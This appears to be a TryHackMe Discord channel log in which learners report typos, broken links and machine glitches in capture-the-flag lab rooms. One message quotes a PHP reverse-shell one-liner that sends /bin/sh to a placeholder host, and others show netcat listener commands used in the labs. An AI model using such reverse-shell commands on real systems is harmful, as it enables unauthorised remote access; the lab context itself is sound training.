#room-bugs

1 messages Β· Page 16 of 1

obsidian kiln
#

Fixed πŸ‘

honest crescent
#

But room juiceshop is still full of hints etc.

twin tapir
#

I believe that’s because cake originally made the room without a large walkthrough aspect then had to add in some hints and walkthroughs for answers as users were getting hung up on questions

honest crescent
#

Ah

#

Okay

#

Makes sense, but it's easier than all other boxes if you followed the others

twin tapir
#

It’s not meant to be hard

honest crescent
#

Fair

languid hearth
eternal summit
#

I think it just takes a long while to boot?

languid hearth
#

not really

#

I waited 10 mins as it said on the taks

#

task*

# 
PORT     STATE SERVICE  REASON  VERSION
8000/tcp open  http-alt syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 
|     Date: Wed, 09 Dec 2020 21:34:11 GMT
|     Connection: close
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.1 404 
|     Content-Length: 0
|     Date: Wed, 09 Dec 2020 21:34:10 GMT
|     Connection: close
|   RTSPRequest, Socks4, Socks5, X11Probe: 
|     HTTP/1.1 400 
|     Date: Wed, 09 Dec 2020 21:34:10 GMT
|_    Connection: close
|_http-title: Site doesn't have a title.
timber bone
#

The hint for the first question of day 9 of AOC says this Recall how Linux indicates permissions to files and folders from Day 8! and i don't know if i'm blind but i didn't see nothing about file permissions in day 8

glad badger
#

That hint can probably be removed for Day 9 Q1. I don't have it in my test notes as being there, so it is new. Thanks @timber bone

cold swallow
#

is it bug ?

eternal summit
#

No

#

That's where the ARP comes from, not what it resolves to?

#

Maybe there are multiple IPs?

cold swallow
#

ok will check

#

How would you describe that it is possible to use multiple IPs with the same mac address?

#

-Modem mac address?

eternal summit
#

This is no longer relevant to room bugs

cold swallow
#

Thx btw

naive eagle
#

Yeah i get that part now, but the rest of the hydra section reads like a walkthrough with example commands, in which the json looks to be passed as form encoded, and I think it could be worth making a more prominent note about that fact that you might want to try specifying a content type header if your hydra run doesn't seem to be working, or something to that effect

frank light
#

In the regex room
To match the IPv4 addresses
"(\d{1,3}.){3}\d{1,3}" got accepted as the correct answer
But it also accepts
01.01.01.01
999.999.999.999

#

Was the motive only to match IPs, not caring about the wrong ips?

#

I understand that creating the regex room is hard since you can accept only a single answer
Just wanted to clarify

eternal summit
#

What task is that?

#

Match every possible IPv4 IP address

#

You do that

#

You match other things, but you match all of those

frank light
#

It's in Task5

signal sleet
#

Advent of Cyber 2
Day 7 Question 2
Answer will be : http.request.method == GET
Double equal is right but it taking correct answer on single equal

I'm not a pro on this things so if I'm wrong please pardon my mistakes.

πŸ“Ž thm_day7_question2.png
fervent hearth
#

In adventofcyber2 there is a spelling mistake in the question 4 of day 9 (task 14) the last word should say from but it says frm

eternal summit
wheat fractal
#

Hey all, Fairly new to TryHackMe and trying the Kenobi room.
When I try to mount the NFS i'm getting: access denied by server while mounting 10.10.85.205:/var
Any ideas?

vocal zinc
#

Sudo

eternal summit
#

I don't think this is a bug

wheat fractal
#

I am running as root, before I tried with sudo and same results

#

Since the room gives the commands with screenshots, I'm pretty sure that's all supposed to work, but I can't connect to the NFS as it tells me to. Isn't that a bug?

eternal summit
#

Go to the room help chats first

#

The room has not changed

#

99.9% change that it's user error, which is why I'm directing you there

wheat fractal
#

ok, i'll ask there

mellow grail
#

room : jvmreverseengineering > task 1 and task 5 image link doesn't work anymore

real barn
#

typo on /room/completebeginner "On the contrary, it's how actually learn to solve the problem."

safe plover
#

There is a bug in the Advent of Cyber 2 room that doesn't let me Terminate the machine instance I've deployed

eternal summit
#

????

safe plover
north gyro
#

refresh the page

safe plover
#

When I do that, the instance still being there

north gyro
#

do you want it deployed or terminated?

safe plover
#

Terminated

north gyro
#

after a refresh is the terminate button visible?

safe plover
#

Yes

north gyro
#

does clicking it terminate the instance?

safe plover
#

The website say it was terminated, but when refreshing it is there again

north gyro
#

does the instance have an expiry?

safe plover
#

Yes, I've been waiting at least 40 min. The timer is close to zero but I reported the issue btw

north gyro
#

try clearing your cookies, not sure if it will help, you will need to login again

safe plover
#

Done

#

But the issue still there

north gyro
#

must be in the backend

#

probably not much you can do

#

except wait

obsidian kiln
safe plover
#

Yeah, that's what I thought

obsidian kiln
#

Might be able to force a termination

north gyro
#

try terminate(this) in the console

obsidian kiln
#

Nah, bit more complex than that

#

But we had some problems a while back

#

Szy came up with a bunch of useful little snippets -- just shove 'em into the dev console and it might solve the problem

north gyro
#

nice

safe plover
#

I did both and didn't worked, but the room expire time is 4 min

north gyro
#

coffee time?

safe plover
#

Jajaj maybe tea, coffee ruin my sleep. It's 21:12 here

#

Thank you both btw

north gyro
#

np

safe plover
#

It's stuck

eternal summit
#

@lucid oasis super sorry if you're asleep, but any idea?

north gyro
#

oh no negative numbers

safe plover
#

Does the AoC 2 machine respond to ping? Because the initial purpose of teminating it was because trying to enumerate smb users and it didn't work

eternal summit
#

There's no single AoC2 machine

safe plover
#

Day 10 sorry

north gyro
#

might sound dumb but try adding an hour

safe plover
#

Actually, now the instance disappeared

north gyro
#

ninja probably did something

safe plover
#

In that case, thank you @eternal summit

eternal summit
#

Discord moderators are discord moderators

#

Not site staff

north gyro
#

well it either died by itself or someone killed it

#

dont know which

safe plover
#

Hahahah well, now I'm afraid of deploy it again. Buy thank you very much for the help

north gyro
#

sounds like its good to go again

#

lightning never strikes twice?

safe plover
#

Hahaha literally that happened to someone, I think I heard about that lightning sfuff

north gyro
#

yeah, some people are lightning rods

#

i had lightning strike a tree like 100 meters away and i hit the deck like a bomb was going off

safe plover
#

Well, this is not the case. The deployed machine have been terminated successfully

#

Good night, and thank you everyone that helped me

primal shadow
#

In AoC2 Day 10: I think there's a typo:

why not give a few others a try and apply your knowledge in the "Kenobi" Capture the Flag (CTF) or the "Anonymous" (Walkthrough)
Isn't Anonymous the CTF and Kenobi the Walkthrough?

obsidian kiln
#

@dusky junco

dusky junco
#

Whoops!

#

πŸ˜„

stable falcon
#

I'm not sure if this is a bug or if I'm just being dumb, but I've been having trouble using enum4linux in the Basic Pentesting room, using the same command John Hammond shows on his walk-through video.
I'm getting an error along the lines of 'Used uninitialized value $user' (I'll send through an image). It worked fine with today's Advent of Cyber task though, which is leading me to believe it's something that's changed in the Basic Pentesting box.

obsidian flame
#

hmm, try rebooting the box and see if the same happens @stable falcon

stable falcon
#

I've rebooted a couple of times, it still gives me the same error

obsidian flame
#

hmm, what do you get when you run enum4linux IP with no switches?

#

my sub expired today otherwise i would've checked for you 😦

ripe magnet
#

it's a free room iirc

obsidian flame
#

yeah, but i don't have a VM as i am on my work laptop

stable falcon
#

it seems to find the shares, but it's still got the same uninitialized value $user error, and gives 'unknown' for all the users in the RID cycling section

#

no worries!

obsidian flame
#

i can have a look at this in an hour or so for you. otherwise if anyone else is willing to have a look over it i don't mind

stable falcon
#

thank you!

obsidian flame
#

no worries, i do apologise for not being able to lend a hand as of now

ripe magnet
#

@stable falcon DM me

ripe magnet
#

Note: We uninstalled and reinstalled enum4linux, and tried the command without switch, still not working. It worked for him on the AoC2 challenge
I'm letting someone more competent than me help him

frail vigil
calm socket
#

Hi ! I have an issue with the flags validation for « All in One » room. I pwned the box and have the two flags but they seems to not working. Is anyone here who had the same problem ?

mellow grail
indigo orchid
#

Can any admins look into this one please?
In https://tryhackme.com/room/ccpentesting, task 21, smbclient, last question - In the interactive prompt, how would you upload your /etc/hosts file? when I type the answer put /etc/hosts and submit, BitDefender Total Security blocks the request or something and gives me a notification saying

Online Threat Prevention
An attempt to access your files from an external source was made by {IP address}. We blocked the connection to prevent remote code execution on your device.

and I get Uh-oh! undefined pop up on THM website.

eternal summit
#

Bitdefender gets false positives when you use /etc/hosts or /etc/passwd @indigo orchid

#

You're on windows

#

You don't have those files

#

Bit defender is lying to you.

indigo orchid
#

lol

#

i feel stupid now

#

thanks btw!

glacial tree
#

Not exactly a bug, but I don't know where to post this.
AoC Day 11's learning objectives are wrong, it is duplicated from Day 8.

hazy tiger
#

@dusky junco ?

dusky junco
#

Ah shoot β€” I’ll get to that when I get to my PC on a hour or so

wheat fractal
#

Man

#

This must be a pretty big typo πŸ˜†

fast bobcat
#

Hi there!

I've found some things in the current Advent of Cyber 2 room.
I'm not sure in the first two, but for me it seems logical this way.

In Day7 There is a text that says: "It's 6 AM and Elf McSkidy is clocking-in to..." I think it should be McEager, since the later part of the text suggests that way. "After logging in, Elf McEager proceeds..."

In Day10:
The first sentence in 10.3: "Whilst we learnt about one of the most commonplace protocols that are used for file-sharing on Day 10..." I thinks it refers to day 9.

In Day11: "Let's exploit a local copy of a DVWA (DamnVulernable Web App" It's just missing the closing bracket and the letter 'n' from vulnerable

wheat fractal
#

Oh thank god

#

Nothing related to me

#

You get to live @fast bobcat

fast bobcat
#

and in the 11.11 Covering our Tracks there is the"/var/log/<service/" <- missing a closing '>'

civic brook
#

Most of the task and room creators are not doing this full time and are volunteers, spelling and grammar mistakes are bound to occur

fast bobcat
fast bobcat
eternal summit
dusky junco
keen gate
#

Doing vulnversity and, um... ||Ubuntu|| is not an operating system πŸ˜‚

green steppe
#

yes it is

eternal summit
#

xD

keen gate
#

I thought GNU was the OS, Linux was the kernel, and Ubuntu was the distro... but thinking about it, I guess you could call the distro an OS in the sense that the whole package does contain/is an OS.

eternal summit
#

Linux (/ˈlinʊks/ (About this soundlisten) LEEN-uuks or /ˈlΙͺnʊks/ LIN-uuks[9]) is a family of open-source Unix-like operating systems based on the Linux kernel,[10] an operating system kernel first released on September 17, 1991, by Linus Torvalds.[11][12][13] Linux is typically packaged in a Linux distribution.

#

You can have non GNU linux

green steppe
#

Hold up do I have a copypasta for you

#

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

keen gate
#

ohai RMS when did you get here

green steppe
#

Wait

#

Discord is not open source?

#

Deleting my account brb

frail vigil
#

Get the response copy pasta as well πŸ˜„

flat timber
eternal summit
#

@obsidian kiln rip your domain

obsidian kiln
#

Oh for the love of. Not again

#

Gimme a sec @flat timber

#

I think that was the only one I did pre-imgur days

#

I really should just set up an assets subdomain

#

Is that fixed now @flat timber?

flat timber
solemn topaz
lofty pilot
dusky junco
#

Hey thanks! Yes this is the right place

#

That's a Deskel room who unfortunately is no longer on the platform

#

as it's only for two questions, I'll remove the questions that require the pastebin links so that the rest of the room can be kept public

#

thanks (:

lofty pilot
hazy tiger
dusky junco
#

Ah that's a wicked find @lofty pilot Thanks for managing to dig that out! That's even better

#

I'll replace the tasks with the text. Wicked stuff

lofty pilot
#

Thanks @hazy tiger , awesome content

#

Sure @dusky junco , I like rooms created by deskel
Hope someday ctf 100 comes live again

tiny ginkgo
flat timber
#

@green steppe I was going through one of your pages, and was trying to access this link https://tryhackme.com/room/zthlinux but it showed that room is private. Is it that the room is no longer present or something ?

lunar vortex
#

@eternal summit The port generated for Looking Glass is nonexistent, it's apparently between two ports that respond "higher" and "lower" respectively, so I'm stuck

#

just gonna restart it, but that should be fixed

eternal summit
#

It's not gonna be touched

#

Seeing as it's impossible

#

Autogen boxes are a pain to work with

#

Yeah it's not mathematically possible for it to fail that way

molten pagoda
#

Not sure if its just my setup but on internal the address internal.thm doesnt resolve makes doing the room interesting.

obsidian kiln
#

There's no name resolution on the THM network -- mainly because each box could be deployed several times on the same subnet by different people

#

With that in mind, how do you think you could get it to resolve?

honest crescent
#

Apparently some rooms have in /etc/ folders with the dot files for the users IIRC. This I noticed a bit ago when doing a Linux VIP room where you had to read a user's files and I wasn't sure where to look. But these files also contain the flags...

#

I'm not sure if it's configurable with a cron job to make them unable to be read and if the dot files are removed it reinstates them with original perms, but maybe it could be useful. Not sure if it's a bug or a feature though

molten pagoda
obsidian kiln
#

No. As I said, what can you do locally to resolve it

#

Because that's what you're meant to be doing

molten pagoda
#

oh

obsidian kiln
#

Does the "hosts" file mean anything?

molten pagoda
#

Ah I thought it was just a bad set up haha

#

Ok so dns records

#

all good haha

obsidian kiln
#

Nah, no DNS

molten pagoda
#

Ah yeah sorry just what I mean is hosts so it doesnt use dns

#

I think.

#

but If there is something to do there then all good I will figure it out

flat timber
viral cobalt
flat timber
viral cobalt
#

we'll have to assault Pars with questions why the room is private :P he probably got tired of all the shiba1 questions

dusky junco
#

It's been made private as it has been split into three seperate rooms (:

latent terrace
#

Has anyone ever addressed/enquired about the fact that the OWASP Top 10 - XXE box(Task 12) is sorta not really XXE?

After reading the code behind the flask app, it sort of feels a bit off. Its great the text covers the concepts and so forth, but after going through the lab and so forth, i accessed the box and red the code XXE.py to see if i could understand the issue from that side, but it lead me to the conclusion that the app just looks for specific elements and then throws the output (which after testing is validted)

twin bay
#

Adventofcyber2 - Day 12 - Hint on the final task - Minor typo

Metasploit has post exploit suggestion scripts that may show your the "PATH"

latent terrace
#

owasptop10 - [Severity 8] Insecure Deserialization - Cookies Practical
Not sure if this is actually considered a bug, but the /admin panel dosnt actually validate/check if the usertype cookie is set to admin.

signal shore
#

@tough linden ~~Possible issue with windows10privesc room, task 9. AutoAdminLogon is set to 0. According to Microsoft documentation, AutoAdminLogon sets itself to 0 if no DefaultPassword was provided. https://docs.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/turn-on-automatic-logon~~ I managed to get it to work by guessing the password. Based on my understanding of the task, the password should have been present in the registry, but I could not locate it.

πŸ“Ž AutoLogonIssue.PNG
wheat fractal
indigo orchid
#

In Nmap room, Task 9 -
https://tryhackme.com/room/furthernmap
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)

  • It accepted 172.16.0.0/18 in the answer while it should have only accepted 172.16.0.0/16.
eternal summit
#

Answer tolerance

#

Not exactly a room bug. Just a site bug

indigo orchid
#

ohh okay, just thought I should put it here since I am going through that room

dusky junco
dawn rover
#

Section 3 - Metasploit Setting up

#

The correct answer is - set SMBUser password

north gyro
#

@tribal dirge there is a 1 character tolerance sometimes

vivid bane
dawn rover
#

Alright got it

#

thanks

dawn rover
north gyro
#

so if you enter the correct answer then quickly change it, it accepts the wrong answer?

dawn rover
#

Yes exactly

hazy tiger
#

No, it just displays the wrong answer, it doesn’t accept it

#

If you refresh, the answer will change to the correct one.

dawn rover
#

Oh right yea

kind knot
#

Hello, something weird keeps happening in the Advent of Cyber room I'm in. Every time I deploy a machine after some time, I get the message that the machine is about to expire yet the banner shows like 30 minutes left.

#

Then after a couple minutes, I get the message that the machine has expired.

#

yet when I refresh the page, the machine is still up

crude current
#

Hi. I got stuck on Room: networkservices2 Task 9 Question 4: When listing options I only see SQL, RPORT, RHOSTS as required. But the answer should be different. I have no idea what I am missing. Any help is highly appreciated.

civic brook
#

@obsidian kiln your OWL images links are all broke in the writeup

obsidian kiln
#

In the writeup on my own blog?

#

@civic brook?

#

Loading fine for me

civic brook
#

go to snmp

obsidian kiln
#

That's after a cache dump as well

#

What's it showing you?

civic brook
obsidian kiln
#

What's the link pointing at?

civic brook
obsidian kiln
#

Could you do a hard refresh for me?

#

As in Ctrl + F5

civic brook
#

working now

obsidian kiln
#

Perfect πŸ‘

#

I had some htaccess problems a week or so ago which caused a bunch of that, but they're all pointing to the right place here now, so it shouldn't be a problem

civic brook
#

I thought it was that same, I didn't think I had it up that long though

obsidian kiln
#

Could potentially have served you a cached version if you'd looked at it previously

#

I have no idea what the cache times are for that thing

merry merlin
#

Hi, in "What the Shell?" room, it seems even though you have 2h timer on windows machine, it expires after 1 hour. Or did i killed it twice in same time? πŸ™‚

eternal summit
#

Probably the site bug with windows machines

latent vessel
#

There is a bug for the deployment of machine. Machine is deployed but after certain seconds it says ur machine is expiring soon but when I refresh the page it is not so. Please look into the issue

eternal summit
latent vessel
#

I think it is a issue

#

Not a bug

eternal summit
#

@latent vessel it's not a bug with a specific room

#

This channel is for bugs with specific rooms

#

Not site bugs

latent vessel
#

I think it shows me weird things that's why

eternal summit
#

This is the wrong channel. Do you understand? Please repost it in #site-bugs @latent vessel

latent vessel
#

Ok sorry

soft crane
#

wasptop10 - [Severity 8] Insecure Deserialization - Code Execution
nc -lvnp 4444

#

Listening on 0.0.0.0 4444

nova marsh
orchid cedar
#

are there like forums or something where you can see what people did in response to things that seem messed up ? like in the burp suite room, how it says "Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request:" ---and the site JavaScript and "scoreboard" etc none of this has been mentioned in the room i have no idea wtf it's talking about

eternal summit
#

Yes there are forums, but this isn't a room bug.

orchid cedar
#

great thanks

plucky jay
hazy tiger
mossy zinc
#

hey guys, just found out that the link provided in the Day 15 about scripting redirect to a private video on youtube

#

the link should be https://www.youtube.com/watch?v=lvcZRKO-B20 and not https://www.youtube.com/watch?v=My9QW0IdaRg

YouTube
DarkSec
TryHackMe Advent of Cyber 2: Day 15

Play Advent of Cyber 2: https://tryhackme.com/christmas

TryHackMe Official Discord: https://discord.gg/tryhackme
TryHackMe Room: https://tryhackme.com/room/adventofcyber2
Thumbnail Design by Varg: https://twitter.com/Vargnaar

John Hammond's Channel: https://www.youtube.com/user/RootOfTheNull

TryHackMe Intro to Python Room: https://tryhackme...

β–Ά Play video
topaz thorn
#

He was aware and the video is up

mossy zinc
merry merlin
#

Hi, AttackerKB room should have hostname in certificate, but it is nowhere to be find. Darkstar skipped this one in his video as well πŸ™‚

topaz thorn
# mossy zinc do you mean this one ? https://www.youtube.com/watch?v=My9QW0IdaRg

https://youtu.be/lvcZRKO-B20

YouTube
DarkSec
TryHackMe Advent of Cyber 2: Day 15

Play Advent of Cyber 2: https://tryhackme.com/christmas

TryHackMe Official Discord: https://discord.gg/tryhackme
TryHackMe Room: https://tryhackme.com/room/adventofcyber2
Thumbnail Design by Varg: https://twitter.com/Vargnaar

John Hammond's Channel: https://www.youtube.com/user/RootOfTheNull

TryHackMe Intro to Python Room: https://tryhackme...

β–Ά Play video
mossy zinc
#

kk, alright

#

πŸ˜„

north gyro
#

room Linux strength training,
suggest change
What are the proceeding characters after the searched word you found?
to
What are the characters immediately after the searched word you found?

thanks.

obsidian kiln
#

@north gyro which task

north gyro
#

@obsidian kiln task 2, second last question

obsidian kiln
#

That wording didn't make sense as it was, so I have updated it

north gyro
#

@obsidian kiln thanks! πŸ‘

tall nexus
#

proceeding is correct. but if the update makes it easier for people thats fine πŸ™‚

obsidian kiln
#

You wouldn't use it in that context @tall nexus. Subsequent is the word you'd use when describing something that comes after something else.

#

Proceed as a verb does indeed mean to go forward though

#

(and use, that is weird, given you'd use preceding for something that comes before -- just a weird nuance of English)

astral briar
#

Complete Beginner path

tiny ginkgo
eternal summit
#

No it should say Wide

#

It's a reference to @faint ridge who is both wide, wise, and door control staff

faint ridge
#

Yeeee

dusky junco
#

Emphasis on wide

tiny ginkgo
eternal summit
#

He can be both

tiny ginkgo
#

Oh..got it. Thanks for the clarification

tiny ginkgo
vocal zinc
#

dis true^

hazy tiger
#

Smh Bee

eternal summit
#

@dusky junco can u fix plz?

dusky junco
#

Bare with, that should of been updated?

#

but it doesn't appear to hav ebeen

vocal zinc
#

bear

tiny ginkgo
#

Firstly the requests.get() methods returns a response object which is getting stored in the html variable

#

To convert that object into a sting object we can use "html.text"

#

The BeautifulSoup() function accepts a string in the first parameter which will be parsed using the parser we are specifying in the second parameter. So for this example we have to pass html.text instead of html.

#

Secondly, find_all() method accepts a HTML tag as input. So instead of passing " a href" we should only pass "a" as "a" i.e. achor is a valid tag in html or else it will just return an empty list

#

Finally, To get all the links from webpage we can use the get() method.

#

So..It should be like this :- links = soup.find_all('a')
for link in links:
print(link.get('href')) #We can use this get function to print only the links.

surreal stirrup
#

Room Advent of Cyber, today. Have a problem.

#

I cannot speak here. It will disturb the fun.

#

There is a path with all the answers.

#

Everything available in 2 min. No work or scripting.

eternal summit
#

@surreal stirrup With the source? That's being fixed atm

surreal stirrup
#

Okay

split ibex
#

hey in advent of cyber day 16 the server answers with santa's location even if "SANTA PROTECTION MECHANISM ACTIVATED." if you leave the script going, the challenge page says it should block my ip

drowsy stump
#

In day 16 the hint for the second question is wrong. it says its /*/ with 5 asterics and its actually 3

warm wadi
#

Burp Suite
Task 7 - Target Definition
Question: What is the term for browsing the application as a normal user prior to examining it further?
Hint: This will both referenced in the paragraph I've included at the start of this task as well as the documentation for OWASP Juice Shop in getting started. Think of it as walking along a certain path.

I believe this is an error spelling and should be worded
This WAS both referenced in the paragraph I've included at the start of this task as well as the documentation for OWASP Juice Shop in getting started. Think of it as walking along a certain path.

drifting hull
#

Advent of cyber | day 5 | sql | internal server error ???????

naive tapir
#

Hi all.. I'm doing the CC Pentesting, Task 14 John the Ripper.. for questions about format and rules, the answer accepted has "--" but the man page describes single "-"

hazy tiger
#

Refresh your page, might be regex

naive tapir
naive tapir
hazy tiger
#

Wrong screenshot

naive tapir
#

Ok.. well I would have assumed that the rooms are based on the man pages

hazy tiger
#

If I were at my VM, I’d show you that it also has two

naive tapir
hazy tiger
#

Your manual seems to be... different?

eternal summit
#

They're long form flags

naive tapir
#

let me check the attack box

eternal summit
#

All the flags are prefixed with -

hazy tiger
#

You can also type john -h might be better

eternal summit
#

Long form flags are usually --

naive tapir
#

well the room also takes single - here a larger screenshot with a previous answer

#

the first one has single - as in the man pages

hazy tiger
vocal zinc
#

Jabba with the OG phone helping technique

#

Welcome to the club

naive tapir
hazy tiger
#

No

#

I don’t have permissions to edit other people’s rooms

#

I’m just a discord moderator πŸ€·β€β™‚οΈ

naive tapir
hazy tiger
#

Regex

#

Answer tolerance

#

Your answers don’t have to be perfect to be accepted

eternal summit
#

Refresh the page.

naive tapir
#

ok thanks for the help! was very confused.. maybe should add a note saying that if it does not work try with the info from --help

marsh crag
#

Hi! When I submit answers in advent of cyber it says that the question was already answered. Refreshing the page make the answer dissappear.

vocal zinc
#

@dusky junco

gleaming shadow
dusky junco
#

Correct updated @gleaming shadow ty

gleaming shadow
#

wondering if the suffix isn't d as well

#

ah seems to be fixed after the refresh

green ermine
vocal zinc
#

Replace machine ip with The machine ip

green ermine
#

will that work

vocal zinc
#

My 2 options here:
1- answer your question with a yes and repeat what I said before because you didn’t try what I said
2- say no and come off as a poop head because you didnt try what I said

#

I opt for #2

  • no it won’t work I lied to you
viscid dragon
#

Does room vulnversity have certificate?
I completed the room where can i fetch my certificate?

eternal summit
#

@viscid dragon No.

viscid dragon
#

oh ok thank you

merry merlin
#

Hi, im just on Linux: Local Enumeration room, first (seems like super easy) task, i put short script (php -r '$sock=fsockopen("{IP}",{PORT}});exec("/bin/sh -i <&3 >&3 2>&3");') into cmd.php field with my ip and port (with nc -lvnp <port> waiting on my machine) but no shell is spawned, actually via tcpdump nothing even arrives. I tried even simple "nc <my IP> <port>"....nothing, interesting is that routing seems ok, because room website is working fine, any suggestion?

#

mkfifo works, interesting

merry merlin
#

copy and think twice, double right curly bracket on port get me...

green ermine
wheat fractal
#

Everytime I post something in this channel i'm just being super nit picky about grammar and typos haha i'm sorry cri I found a few (what I think?) are oopsies in the Linux Fundamentals Part 3 room!

#

"find what your're looking for" Instead of "find what your looking for"

#

This is under Task 6 -grep in the same room "when I said the syntax was" instead of "when I says the syntax is" Just staying consistent with past tense and the flow of the room! blobheart

#

This is the last one I swear lol ;;! "except they're called directories" instead of "except their called directories" because "called" is an adjective! :d

smoky sinew
green ermine
#

please help me

slate parrot
#

Issue in the β€œOWASP Top 10” room, Task 25, Q2. Visiting IP/admin (without changing cookie values) immediately reveals the flag.

sonic willow
green ermine
#

OHH OK

#

so then i have to click the link

surreal stirrup
#

||
from typing import Optional

from fastapi import FastAPI

from starlette.applications import Starlette
from starlette.routing import Mount
from starlette.staticfiles import StaticFiles

routes = [
Mount('/static', app=StaticFiles(directory='static'), name="static"),
]

app = Starlette(routes=routes)

app = FastAPI()

counter = 0

@app.get("/items/{item_id}")
def read_item(item_id: int, q: Optional[str] = None):
global counter
counter += 1
if counter >= 50:
return {"item_id": item_id, "q": "SANTA PROTECTION MECHANISM ACTIVATED."}
elif counter == 57:
return {"item_id": item_id, "q": "Winter Wonderland, Hyde Park, London."}
else:
return {"item_id": item_id, "q": "Error. Key not valid!"}
return {"item_id": item_id, "q": counter}

||

#

This is still available

#

Task 21 [Day 16] Scripting Help! Where is Santa?

surreal stirrup
signal shore
#

https://tryhackme.com/room/introtox8664
On the if statements continued section, there is a line that reads "The cmpl instruction compares the value of eax with that of the var_8h argument"
It appears the cmpl instruction is comparing the value of eax with that of the var_4h argument.

#

Minor typo, but is still confusing to someone unfamiliar with the subject.

vivid bane
#

I found similar thing for other windows machine too

topaz thorn
vivid bane
glad badger
#

Message with image deleted, as it is showing answers. @vivid bane

slate parrot
#

I am in the OWASP Room, Task 29. I am running the python script (having commented out the CVE as detailed in the notes), however that is generating the following error on the AttackBox: TypeError: a bytes-like object is required, not 'str'. I have tried adding a .encode() on line 54, but that does not resolve the issue. Any ideas?

latent vessel
#

U have a string to be added somewhere it's a type error it means string should not be there at that line other types can be associated there

slate parrot
#

The input for the file expects a string …

warm cobalt
#

On THM room Break it, task 1 the Insane flag, the pastebin is dead

distant field
#

I was currently doing 'Network Services' by @PoloMints. Task 7 mentions a Reverse Shell. I am wondering, why is that mentioned? In my understanding the telnet is no Reverse Shell but a Bind Shell.

eternal summit
#

@distant field The telnet service there gives you blind RCE.

#

You're using a reverse shell to go from blind to regular RCE.

#

This isn't a bug.

distant field
#

@eternal summit ah! Got it! thank you.

#

Note to self. Finish a room before providing feedback =)

astral briar
#

https://tryhackme.com/room/rust
Task 7 (Functions) has an attachment of a .zip and it contains 2 folders (code and questions) but both are empty
Doesn't seem necessary for an external material in order to complete the task questions

sly mason
#

on advent of cyber day 12, for the privesc is it intented that ||you can privesc by just running getsystem then migrating to winlogon.exe (in meterpreter)||? (not sure where to post this, sorry if its in the wrong channel)

sonic willow
#

@green steppe rust ^^

green steppe
#

uh oh

#

thanks jake <Β£

gleaming shadow
#

There's a rust room?

green steppe
#

yuppp

#

made by yours truly

astral briar
#

it was good thanks πŸ˜„

still quiver
#

When looking at the 1st hint from Day 16, the hint itself looks like this:

#

Not sure if it is a bug or it's intended

hazy tiger
#

It looks intended

#

Lemme check

still quiver
#

Okey, just wanted to ask in case the hint is supposed o be any other thing

hazy tiger
#

Okay I’m going to contact the creator bee; they don’t usually come on for another couple of hours so I’ll let you know when they report back, thanks!

still quiver
#

Sure πŸ™‚

#

Thanks

tame aspen
#

I don't know if it is already discussed here but i remember there once a time when most of the subscribed rooms were able to open and joined by non-subscribed user. I tried wireshark 101 and few others, and also i was able to open the learning offensive paths and saw the room list there. Was that a bug? I think right now the bug has been resolved somehow

mint harbor
latent terrace
#

I see a few a people already asked about it but in the "attacking kerberos" room, the question "What two services make up the KDC?" is shown with a solution format looking like this **,*** It should be like this **, *** With a space after the comma.

opaque compass
#

when i register a new " darren" i dont get automatically logged in as stated
neither can i log in manually with the set password

eternal summit
#

Please don't just ping me when you want help.

#

Everyone here is a volunteer.

#

We help when we want, and on our terms.

opaque compass
#

understood

latent terrace
#

i dont know if this is considered a room bug, but apache guacamole in the "post-exploitation basics" room keeps trying to connect but never gets a actual connection. iv tried over 3 times but there seem to be something wrong, second time i waited for 40 minuts to get a connection but no dice.

slate parrot
steep pollen
#

The room "Year of the Dog" has a bug.

#

The password of the "dylan" user is not working.

#

I double check the write-up.

hazy tiger
#

Are you sure you're typing it in correctly

steep pollen
#

100%

eternal summit
#

Are you sure they're not dynamic passwords?

steep pollen
#

Checked ssh and su

#

Would you mind checking on it?

#

If you need anything, pm me!

steep pollen
#

Please let me know if you have any updates. thnx

obsidian kiln
#

The box has not been updated since release, and the password for that one is static. Nothing has changed, therefore it will still work

steep pollen
#

The writeups don't have passwords in them.

#

But, the password is not working.

obsidian kiln
#

The password will work fine

#

I suspect you're skipping the exclamation mark from the end of it

#

Hm, Might have removed that actually. Can't remember

steep pollen
#

let me pm u

obsidian kiln
#

From memory I changed the password because it wasn't showing up there

#

Also please watch rule one @steep pollen

steep pollen
#

deleted the message. sorry for the spoil

obsidian kiln
#

I've confirmed that the password is still correct

steep pollen
obsidian kiln
#

As in, I remember doing it

steep pollen
#

Isn't the password supposed to be in the FILE

#

grep it...

obsidian kiln
#

I just did

#

That's a literal copy and paste from the file

steep pollen
#

ok

#

let me check again

#

I'm sure i did the copy/paste correctly

#

still nothing

#

let me send you a screenshot in pm

#

@obsidian kiln Thanks for the clearup

opaque compass
lucid quiver
#

Was messing with the post-exploitation basics room and noticed guac was taking a while to connect to RDP - checked the configuration of the remote system in guac and the access credentials in the guac config are mismatched with the course content. (changed password/domain and it loaded)

twin tapir
#

that room has guac what?

#

huh

#

TIL my room has guac on it

#

cc: @lucid oasis I certainly didnt set guac up in that room did you guys or @dusky junco ?

obsidian kiln
#

Yes, it was set up Cry

lucid quiver
#

ye easy way to see if guac is running is the ol ctrl+alt+shift (pops out the clipboard)

obsidian kiln
#

Skidy did it a few months ago

lucid quiver
#

anyways ye it worked post credential change

#

i assume those changes dont stick tho lol

north gyro
#

ROOM: "ZTH: Obscure Web Vulns"
TASK: "14"
